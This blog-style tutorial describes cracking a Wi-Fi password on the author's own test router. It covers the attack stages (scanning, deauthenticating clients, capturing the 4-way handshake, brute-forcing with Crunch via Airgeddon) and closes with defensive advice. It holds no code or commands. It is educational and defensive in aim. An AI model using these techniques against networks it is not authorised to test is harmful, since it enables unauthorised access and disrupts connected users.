Wi-Fi Attacks – Cracking the Handshake

Introduction

When it was introduced to the mainstream plug and play wireless technology became a game changer in how we interact with the internet at work and home. It allowed even those with limited technical knowledge and skills to get setup, connected, and online in just minutes.

While Wi-Fi is incredibly convenient, there are real risks that come with it that users aren’t always aware of. We take for granted that Wi-Fi is a conduit to getting online, but it’s often overlooked that it effectively connects all devices on the same network together. A rogue device could use this to compromise other devices, detect passwords, or even to steal personal data.

With the recent rise in attacks against Critical National Infrastructure organisations, it’s worth noting that alongside the use in homes and work places, Wi-Fi devices are sometimes used in Industrial Environments as a way to bridge wide areas where a physical connection may not be feasibly put in. If these aren’t adequately secured and monitored – it can provide easy to critical networks access for a malicious individual.

In many cases the convenience of WIFI networks often mean that basic security and due diligence is overlooked.

In this post I want to run through a pen testing tool for cracking Wi-Fi networks, and highlight the steps that need to be considered to protect against these types of attacks.

Objectives

The objectives of this post are to demonstrate the principles behind how wireless networks work, how they can be hacked, and what needs to be done to defend them.

There are several different techniques that can be used to target Wi-Fi networks, from physical based access attacks, to social engineering.  In this post I’m going to focus on a specific type of attack (Brute Forcing) that can be performed remotely.

The Setup

It goes without saying that attempting to interfere with any Wi-Fi network that’s not your own is a bad idea, and that you should only practice on your own hardware.

For the purpose of this test I’ve set up a small controlled environment with a dedicated mini TP Link router, with no other devices connected, or access to the internet – a perfect target for testing the attack without interfering with anyone else.

To run the attack itself I will be using a virtualized instance of Kali Linux, as well as a specific type of external wireless card (Alfa Network external network adapter).

For the test, the Wi-Fi routers password has been set to 12345670 – not very secure, but it will work for demonstrating the attack and the underlying principles.

Cracking the Handshake – The (short) Theory.

This attack works by taking advantage of how client devices communicate with a router and establish an authenticated connection. This process is commonly known as a 4-way handshake. 

In this type of attack, the attacker forces all clients to connect from the router, and when they go to reconnect (default behavior for client devices), the attacker captures the handshake. This can then be cracked offline to reveal the Wi-Fi password.

There are four key stages to this attack:

1. Scanning - Identify the target network.
2. De-authentication - Boot the clients on the network.
3. Capturing the handshake – As the clients reconnect, the 4way handshake is exchanged, and captured.
4. Cracking – The captured 4-way handshake is cracked to provide the plaintext Wi-Fi password.

Cracking the Handshake– In Practice.

Introducing the Tools - Airgeddon

For the purpose of this post, I’ll be using a Wi-Fi auditing and Wi-Fi penetration testing framework, called Airgeddon.

Airgeddon is a bash script that provides a command line interface to a number of different Wi-Fi testing and auditing tools. The benefit of Airgeddon is that it streamlines the process of capturing and cracking wireless network credentials – whilst still requiring the user to understand the underlying processes and technologies.

Airgeddon isn’t included in the standard Kali Linux tool sets – but can be found here.

?Scanning

After starting the Airgeddon framework, the first thing that is needed is to scan for and identify the network we want to target.

This can be done by putting the Wi-Fi wireless network adapter into monitor mode, and from there we are able effectively listen to all the Wi-Fi broadcasts in our surrounding.

Below is the result of a quick scan, showing my active TP Link router.

The scan shows us:

• The routers mac address (BSSID)
• The routers name we are more familiar with (ESSID)
• The cipher type used for encrypting the password (ENC Cipher)
• The proximity of the router to the wireless adapter (PWR)
• As well as showing that some data has been detected, indicating a user is connected (#Data)

From here we have everything needed to start the process.

Deauthenticating and Capture

As mentioned above, a process called the 4-way handshake is used to ensure a secure and encrypted channel between the client and router is established. Essentially this process allows the router to confirm the Wi-Fi credentials from the client, setup a secure communication channel, and grant access to the network.

In this stage, our attack is looking to capture this four-way handshake – which can then be cracked to give us the Wi-Fi password.

To do this, we need to force the connected client (in this case a phone) to disconnect from the router, and then allow it to reconnect. In the process of reconnecting, the phone has to confirm that it has the correct password (through the 4-way handshake) to allow it to connect to the router.

The attack works (show below) by sending deauthentication packets to the router – effectively flooding the router and causing all other connected devices to disconnect.

This causes the phone to be temporarily disconnected from the router. Once the deauthentication process stops, the phone automatically attempts to reconnect to the router – and in doing some the 4-way handshake is broadcast and captured by the attacker.

Cracking the password

Now the 4-way handshake has been capturing, the next stage is to attempt to crack it – and reveal the Wi-Fi password.  For the purpose of this demonstration a brute force attack will be used – using the tool Crunch.

Using the brute force method, the initial parameters need to set to direct the attack. In this case, as the password is known (12345670), we can shorten the cracking process by instructing the attack to only use numeric characters in the attempt. 

Using Crunch for the brute force attack it incrementally increases the number, starting at 00000000, and incrementing the value each turn, working through all values until it reaches 99999999 - Each time checking the new value against captured in the 4-way handshake.

The process took just under 3 hours for the attack to successfully identify the correct password – 12345670.

The Defense

The purpose of show casing the tool and the underlying principles was to highlight how an attacker could get access to even a secured wireless network.

The convenient nature of Wi-Fi networks often means that security is an after thoughts – or believed to be completely infallible. As the tool and attacks showed, the process to crack Wi-Fi passwords is straight forward.

In terms of defense, there are a few things that everyone should do (with some of these being routine activities):

1. Wi-Fi Passwords – Change the default Wi-Fi password to something longer, and more complex. There are several online tools that can generate a complex and randomized password. With a complex password, you are effectively increasing the time it would theoretically take for an attacker to crack the password – small tweaks in complexity can exponentially increase the time required to crack the password.
2.  Asset Review – Routinely go into your router’s admin console and have a look at the connected devices (instructions can be found for each router online). Review the PC names and look for unusual or unfamiliar devices that might indicate an unauthorized device. If in doubt, change the password on the router – this will disconnect all devices, and allow you to only grant access to personal and known devices.
3. Implement Whitelisting – Whitelisting is the process of providing the router with only the mac addresses of the assets you want to connect to your router. While there are ways to get around this (Mac Address Spoofing) it should provide an extra level of protection – and alerting if any unlisted devices attempt to connect.
4.  Lastly, be aware of the techniques that can be used against you. If you notice a device keeps disconnecting for no reason – it could indicate someone attempting this attack. Being aware of the techniques allows you to spot the patterns of activity that indicate an attack, or potential attack is taking place. If you see this type of activity, keep an eye on assets connected to the network, and look at changing your password to something longer and more complex.